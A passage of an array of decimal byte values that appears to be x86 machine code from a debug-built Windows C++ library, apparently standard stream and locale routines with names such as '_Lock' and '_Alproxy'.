69,248,139,77,8,137,72,68,139,244,139,77,248,255,21,148,52,2,16,59,244,232,215,206,255,255,95,94,91,129,196,204,0,0,0,59,236,232,199,206,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,77,248,255,21,192,52,2,16,59,244,232,101,206,255,255,139,77,248,131,193,72,59,193,117,39,139,244,139,69,248,139,72,64,81,139,85,248,139,66,64,80,139,77,248,139,81,60,82,139,77,248,255,21,84,52,2,16,59,244,232,52,206,255,255,95,94,91,129,196,204,0,0,0,59,236,232,36,206,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,244,139,77,248,255,21,192,52,2,16,59,244,232,197,205,255,255,139,77,248,131,193,72,59,193,116,48,139,244,139,77,248,255,21,192,52,2,16,59,244,232,169,205,255,255,139,77,248,137,65,60,139,244,139,77,248,255,21,180,52,2,16,59,244,232,145,205,255,255,139,77,248,137,65,64,139,69,248,131,192,73,139,244,80,139,77,248,131,193,72,81,139,85,248,131,194,72,82,139,77,248,255,21,84,52,2,16,59,244,232,100,205,255,255,95,94,91,129,196,204,0,0,0,59,236,232,84,205,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,176,202,255,255,95,94,91,129,196,204,0,0,0,59,236,232,223,204,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,9,204,255,255,133,192,116,68,139,69,248,131,120,8,0,116,59,139,77,248,232,244,203,255,255,139,200,232,128,202,255,255,139,77,248,57,65,8,114,36,139,77,248,232,221,203,255,255,139,200,232,105,202,255,255,139,240,139,77,248,232,204,203,255,255,3,112,20,139,69,248,59,112,8,119,120,139,244,106,78,104,56,249,1,16,104,224,248,1,16,255,21,24,52,2,16,131,196,12,59,244,232,57,204,255,255,184,176,248,1,16,133,192,116,4,51,201,117,40,139,244,104,72,248,1,16,106,0,106,79,104,56,249,1,16,106,2,255,21,232,53,2,16,131,196,20,59,244,232,10,204,255,255,131,248,1,117,1,204,139,244,106,0,106,79,104,56,249,1,16,104,72,247,1,16,104,36,247,1,16,255,21,236,53,2,16,131,196,20,59,244,232,223,203,255,255,51,192,117,252,139,69,248,139,64,8,95,94,91,129,196,204,0,0,0,59,236,232,197,203,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,12,80,139,77,8,81,139,77,248,232,83,201,255,255,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,52,203,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,72,182,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,77,236,232,103,202,255,255,199,69,252,0,0,0,0,139,69,12,80,139,77,236,232,149,202,255,255,139,69,236,139,77,8,137,72,8,199,69,252,255,255,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,143,202,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,77,248,232,102,202,255,255,139,69,248,95,94,91,129,196,204,0,0,0,59,236,232,28,202,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,120,182,1,16,100,161,0,0,0,0,80,81,129,236,80,1,0,0,83,86,87,141,189,160,254,255,255,185,84,0,0,0,184,204,204,204,204,243,171,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,101,240,199,69,232,0,0,0,0,139,69,12,80,232,36,199,255,255,131,196,4,51,201,137,69,216,137,77,220,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,52,52,2,16,59,244,232,130,201,255,255,137,133,176,254,255,255,137,149,180,254,255,255,131,189,180,254,255,255,0,124,121,127,9,131,189,176,254,255,255,0,118,110,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,52,52,2,16,59,244,232,70,201,255,255,137,133,168,254,255,255,137,149,172,254,255,255,139,133,172,254,255,255,59,69,220,124,59,127,11,139,141,168,254,255,255,59,77,216,118,46,139,85,8,139,2,139,77,8,3,72,4,139,244,255,21,52,52,2,16,59,244,232,8,201,255,255,43,69,216,27,85,220,137,133,160,254,255,255,137,149,164,254,255,255,235,20,199,133,160,254,255,255,0,0,0,0,199,133,164,254,255,255,0,0,0,0,139,141,160,254,255,255,137,77,200,139,149,164,254,255,255,137,85,204,139,69,8,80,141,77,184,232,183,201,255,255,199,69,252,0,0,0,0,141,77,184,232,182,197,255,255,131,248,255,117,14,139,69,232,131,200,4,137,69,232,233,228,2,0,0,198,69,252,1,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,48,52,2,16,59,244,232,128,200,255,255,137,133,180,254,255,255,139,133,180,254,255,255,37,192,1,0,0,131,248,64,15,132,235,0,0,0,235,18,139,69,200,131,232,1,139,77,204,131,217,0,137,69,200,137,77,204,131,125,204,0,15,140,205,0,0,0,127,10,131,125,200,0,15,134,193,0,0,0,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,44,52,2,16,59,244,232,32,200,255,255,136,133,183,254,255,255,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,40,52,2,16,59,244,232,254,199,255,255,137,133,176,254,255,255,139,244,15,182,133,183,254,255,255,80,139,141,176,254,255,255,255,21,36,52,2,16,59,244,232,219,199,255,255,137,133,172,254,255,255,139,141,172,254,255,255,137,141,188,254,255,255,232,127,198,255,255,137,133,168,254,255,255,139,149,168,254,255,255,137,149,200,254,255,255,141,133,188,254,255,255,80,141,141,200,254,255,255,81,232,36,197,255,255,131,196,8,136,133,167,254,255,255,15,182,149,167,254,255,255,133,210,116,11,139,69,232,131,200,4,137,69,232,235,5,233,23,255,255,255,131,125,232,0,117,110,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,40,52,2,16,59,244,232,89,199,255,255,137,133,180,254,255,255,139,244,139,69,220,80,139,77,216,81,139,85,12,82,139,141,180,254,255,255,255,21,32,52,2,16,59,244,232,50,199,255,255,137,133,172,254,255,255,137,149,176,254,255,255,139,133,172,254,255,255,59,69,216,117,11,139,141,176,254,255,255,59,77,220,116,9,139,69,232,131,200,4,137,69,232,131,125,232,0,15,133,235,0,0,0,235,18,139,69,200,131,232,1,139,77,204,131,217,0,137,69,200,137,77,204,131,125,204,0,15,140,205,0,0,0,127,10,131,125,200,0,15,134,193,0,0,0,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,44,52,2,16,59,244,232,183,198,255,255,136,133,183,254,255,255,139,69,8,139,8,139,85,8,3,81,4,139,244,139,202,255,21,40,52,2,16,59,244,232,149,198,255,255,137,133,176,254,255,255,139,244,15,182,133,183,254,255,255,80,139,141,176,254,255,255,255,21,36,52,2,16,59,244,232,114,198,255,255,137,133,172,254,255,255,139,141,172,254,255,255,137,141,212,254,255,255,232,22,197,255,255,137,133,168,254,255,255,139,149,168,254,255,255,137,149,224,254,255,255,141,133,212,254,255,255,80,141,141,224,254,255,255,81,232,187,195,255,255,131,196,8,136,133,167,254,255,255,15,182,149,167,254,255,255,133,210,116,11,139,69,232,131,200,4,137,69,232,235,5,233,23,255,255,255,139,244,106,0,106,0,139,69,8,139,8,139,85,8,3,81,4,139,202,255,21,28,52,2,16,59,244,232,242,197,255,255,235,45,139,244,106,1,106,4,139,69,8,139,8,139,85,8,3,81,4,139,202,255,21,232,52,2,16,59,244,232,208,197,255,255,199,69,252,0,0,0,0,184,94,78,1,16,195,199,69,252,0,0,0,0,139,244,106,0,139,69,232,80,139,77,8,139,17,139,77,8,3,74,4,255,21,232,52,2,16,59,244,232,156,197,255,255,139,69,8,137,133,236,254,255,255,199,69,252,255,255,255,255,141,77,184,232,68,196,255,255,139,133,236,254,255,255,82,139,205,80,141,21,204,78,1,16,232,229,194,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,96,1,0,0,59,236,232,82,197,255,255,139,229,93,195,1,0,0,0,212,78,1,16,184,255,255,255,8,0,0,0,224,78,1,16,95,79,107,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,178,182,1,16,100,161,0,0,0,0,80,129,236,28,1,0,0,83,86,87,141,189,216,254,255,255,185,71,0,0,0,184,204,204,204,204,243,171,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,139,244,106,0,141,77,236,255,21,76,52,2,16,59,244,232,169,195,255,255,199,69,252,0,0,0,0,161,100,35,2,16,137,69,224,139,244,139,13,72,52,2,16,255,21,68,52,2,16,59,244,232,133,195,255,255,137,69,212,139,69,212,80,139,77,8,232,4,194,255,255,137,69,200,131,125,200,0,116,5,233,136,0,0,0,131,125,224,0,116,8,139,69,224,137,69,200,235,122,139,244,139,69,8,80,141,77,224,81,255,21,64,52,2,16,131,196,8,59,244,232,64,195,255,255,131,248,255,117,45,139,244,104,228,249,1,16,141,141,220,254,255,255,255,21,228,53,2,16,59,244,232,33,195,255,255,104,228,22,2,16,141,133,220,254,255,255,80,232,228,193,255,255,235,46,139,69,224,137,69,200,139,69,224,163,100,35,2,16,139,69,224,137,69,188,139,244,139,77,188,255,21,60,52,2,16,59,244,232,232,194,255,255,139,77,188,232,66,192,255,255,139,69,200,137,133,240,254,255,255,199,69,252,255,255,255,255,139,244,141,77,236,255,21,56,52,2,16,59,244,232,190,194,255,255,139,133,240,254,255,255,82,139,205,80,141,21,148,81,1,16,232,31,192,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,40,1,0,0,59,236,232,140,194,255,255,139,229,93,195,139,255,2,0,0,0,156,81,1,16,236,255,255,255,4,0,0,0,187,81,1,16,224,255,255,255,4,0,0,0,180,81,1,16,95,80,115,97,118,101,0,95,76,111,99,107,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,8,80,232,147,191,255,255,131,196,4,95,94,91,129,196,192,0,0,0,59,236,232,176,193,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,8,138,0,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,8,15,182,0,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,8,139,77,12,139,16,51,192,59,17,15,148,192,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,196,0,0,0,83,86,87,141,189,60,255,255,255,185,49,0,0,0,184,204,204,204,204,243,171,232,98,191,255,255,139,77,8,57,1,116,13,139,85,8,139,2,137,133,60,255,255,255,235,18,232,73,191,255,255,247,216,27,192,131,192,1,137,133,60,255,255,255,139,133,60,255,255,255,95,94,91,129,196,196,0,0,0,59,236,232,107,192,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,131,200,255,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,199,0,0,0,0,0,139,69,248,199,64,4,0,0,0,0,139,69,248,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,242,182,1,16,100,161,0,0,0,0,80,129,236,216,0,0,0,83,86,87,81,141,189,28,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,244,106,3,141,77,224,255,21,76,52,2,16,59,244,232,100,191,255,255,199,69,252,0,0,0,0,139,77,236,232,174,192,255,255,199,69,252,255,255,255,255,139,244,141,77,224,255,21,56,52,2,16,59,244,232,60,191,255,255,82,139,205,80,141,21,16,85,1,16,232,163,188,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,228,0,0,0,59,236,232,16,191,255,255,139,229,93,195,139,255,1,0,0,0,24,85,1,16,224,255,255,255,4,0,0,0,36,85,1,16,95,76,111,99,107,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,50,183,1,16,100,161,0,0,0,0,80,129,236,228,0,0,0,83,86,87,81,141,189,16,255,255,255,185,57,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,131,125,8,0,116,107,139,69,8,139,8,137,77,224,139,69,236,139,8,59,77,224,116,89,139,244,106,3,141,77,212,255,21,76,52,2,16,59,244,232,76,190,255,255,199,69,252,0,0,0,0,139,77,236,232,150,191,255,255,139,69,236,139,77,224,139,81,4,137,80,4,139,69,224,139,77,236,137,72,4,139,69,236,139,77,224,137,8,199,69,252,255,255,255,255,139,244,141,77,212,255,21,56,52,2,16,59,244,232,7,190,255,255,82,139,205,80,141,21,72,86,1,16,232,110,187,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,240,0,0,0,59,236,232,219,189,255,255,139,229,93,194,4,0,141,73,0,1,0,0,0,80,86,1,16,212,255,255,255,4,0,0,0,92,86,1,16,95,76,111,99,107,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,208,0,0,0,83,86,87,81,141,189,48,255,255,255,185,52,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,56,0,117,12,199,133,48,255,255,255,0,0,0,0,235,13,139,77,248,139,17,139,2,137,133,48,255,255,255,139,133,48,255,255,255,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,56,0,116,103,139,69,248,139,8,131,193,4,137,77,236,139,69,236,131,56,0,116,23,139,69,236,139,8,59,77,248,116,13,139,69,236,139,8,131,193,4,137,77,236,235,225,139,69,236,131,56,0,117,33,139,244,104,181,0,0,0,104,48,250,1,16,104,240,249,1,16,255,21,24,52,2,16,131,196,12,59,244,232,124,188,255,255,139,69,236,139,77,248,139,81,4,137,16,139,69,248,199,0,0,0,0,0,95,94,91,129,196,216,0,0,0,59,236,232,88,188,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,80,232,107,184,255,255,131,196,4,95,94,91,129,196,204,0,0,0,59,236,232,235,187,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,131,56,0,116,29,139,244,139,69,248,139,8,255,21,80,52,2,16,59,244,232,139,187,255,255,80,232,23,187,255,255,131,196,4,95,94,91,129,196,204,0,0,0,59,236,232,114,187,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,232,0,0,0,83,86,87,81,141,189,24,255,255,255,185,58,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,8,139,85,8,59,81,12,115,22,139,69,248,139,8,139,81,8,139,69,8,139,12,130,137,141,24,255,255,255,235,10,199,133,24,255,255,255,0,0,0,0,139,149,24,255,255,255,137,85,236,131,125,236,0,117,13,139,69,248,139,8,15,182,81,20,133,210,117,7,139,69,236,235,67,235,65,139,244,255,21,252,52,2,16,59,244,232,200,186,255,255,137,69,224,139,69,224,139,77,8,59,72,12,115,20,139,85,224,139,66,8,139,77,8,139,20,136,137,149,24,255,255,255,235,10,199,133,24,255,255,255,0,0,0,0,139,133,24,255,255,255,95,94,91,129,196,232,0,0,0,59,236,232,134,186,255,255,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,139,244,139,69,12,80,255,21,8,54,2,16,131,196,4,59,244,232,22,186,255,255,137,69,248,131,125,248,255,117,6,50,192,235,12,235,10,139,69,8,138,77,248,136,8,176,1,95,94,91,129,196,204,0,0,0,59,236,232,237,185,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,244,139,69,12,80,15,190,77,8,81,255,21,204,53,2,16,131,196,8,59,244,232,145,185,255,255,51,210,131,248,255,15,149,194,138,194,95,94,91,129,196,192,0,0,0,59,236,232,119,185,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,244,139,69,12,80,139,77,8,15,182,17,82,255,21,12,54,2,16,131,196,8,59,244,232,31,185,255,255,51,201,131,248,255,15,149,193,138,193,95,94,91,129,196,192,0,0,0,59,236,232,5,185,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,104,183,1,16,100,161,0,0,0,0,80,129,236,204,0,0,0,83,86,87,81,141,189,40,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,199,69,252,0,0,0,0,106,0,106,1,139,77,236,232,174,184,255,255,199,69,252,255,255,255,255,139,77,236,232,185,183,255,255,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,216,0,0,0,59,236,232,107,184,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,152,183,1,16,100,161,0,0,0,0,80,129,236,216,0,0,0,83,86,87,81,141,189,28,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,81,139,204,137,165,32,255,255,255,232,47,185,255,255,139,77,236,232,14,185,255,255,199,69,252,0,0,0,0,106,0,106,0,139,77,236,232,232,183,255,255,199,69,252,255,255,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,228,0,0,0,59,236,232,170,183,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,200,183,1,16,100,161,0,0,0,0,80,129,236,216,0,0,0,83,86,87,81,141,189,28,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,81,139,204,137,165,32,255,255,255,232,111,184,255,255,139,77,236,232,78,184,255,255,199,69,252,0,0,0,0,106,0,106,0,139,77,236,232,40,183,255,255,15,182,69,12,80,139,77,8,81,139,77,236,232,195,181,255,255,199,69,252,255,255,255,255,139,69,236,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,228,0,0,0,59,236,232,217,182,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,64,20,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,216,0,0,0,83,86,87,81,141,189,40,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,137,77,248,15,182,69,8,133,192,117,2,235,72,139,69,248,131,120,24,16,114,63,139,69,248,139,72,4,137,77,236,131,125,12,0,118,23,139,69,12,80,139,77,236,81,139,85,248,131,194,4,82,232,169,180,255,255,131,196,12,139,69,248,139,72,24,131,193,1,81,139,85,236,82,139,77,248,131,193,28,232,118,183,255,255,139,69,248,199,64,24,15,0,0,0,139,69,12,80,139,77,248,232,68,181,255,255,95,94,91,129,196,216,0,0,0,59,236,232,207,181,255,255,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,192,0,0,0,83,86,87,141,189,64,255,255,255,185,48,0,0,0,184,204,204,204,204,243,171,139,69,16,80,139,77,12,81,139,85,8,82,232,83,180,255,255,131,196,12,95,94,91,129,196,192,0,0,0,59,236,232,88,181,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,2,184,1,16,100,161,0,0,0,0,80,129,236,232,0,0,0,83,86,87,81,141,189,12,255,255,255,185,58,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,139,244,139,77,236,255,21,92,52,2,16,59,244,232,230,180,255,255,199,69,252,0,0,0,0,141,69,8,80,139,77,236,131,193,28,232,11,177,255,255,139,69,236,131,192,28,80,141,77,227,232,200,178,255,255,106,1,141,77,227,232,88,180,255,255,139,77,236,137,1,141,141,16,255,255,255,232,38,179,255,255,80,139,69,236,139,8,81,141,85,227,82,232,81,180,255,255,131,196,12,139,69,236,139,8,139,85,236,137,17,199,69,252,255,255,255,255,139,69,236,82,139,205,80,141,21,204,95,1,16,232,231,177,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,244,0,0,0,59,236,232,84,180,255,255,139,229,93,194,4,0,1,0,0,0,212,95,1,16,227,255,255,255,1,0,0,0,224,95,1,16,95,65,108,112,114,111,120,121,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,199,0,0,0,0,0,139,69,248,199,64,4,0,0,0,0,139,69,248,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,104,66,184,1,16,100,161,0,0,0,0,80,129,236,216,0,0,0,83,86,87,81,141,189,28,255,255,255,185,54,0,0,0,184,204,204,204,204,243,171,89,161,12,34,2,16,51,197,80,141,69,244,100,163,0,0,0,0,137,77,236,199,69,252,0,0,0,0,139,69,236,131,192,28,80,141,77,227,232,73,177,255,255,139,244,139,77,236,255,21,96,52,2,16,59,244,232,48,179,255,255,139,69,236,139,8,81,141,85,227,82,232,246,176,255,255,131,196,8,106,1,139,69,236,139,8,81,141,77,227,232,173,175,255,255,139,69,236,199,0,0,0,0,0,199,69,252,255,255,255,255,139,244,139,77,236,255,21,88,52,2,16,59,244,232,236,178,255,255,82,139,205,80,141,21,96,97,1,16,232,83,176,255,255,88,90,139,77,244,100,137,13,0,0,0,0,89,95,94,91,129,196,228,0,0,0,59,236,232,192,178,255,255,139,229,93,195,139,255,1,0,0,0,104,97,1,16,227,255,255,255,1,0,0,0,116,97,1,16,95,65,108,112,114,111,120,121,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,129,236,204,0,0,0,83,86,87,81,141,189,52,255,255,255,185,51,0,0,0,184,204,204,204,204,243,171,89,137,77,248,139,69,248,139,77,8,137,8,139,85,12,137,80,4,139,69,248,199,64,8,0,0,0,0,199,64,12,0,0,0,0,139,69,248,139,13,220,250,1,16,137,72,16,139,69,248,95,94,91,139,229,93,194,8,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,85,139,236,106,255,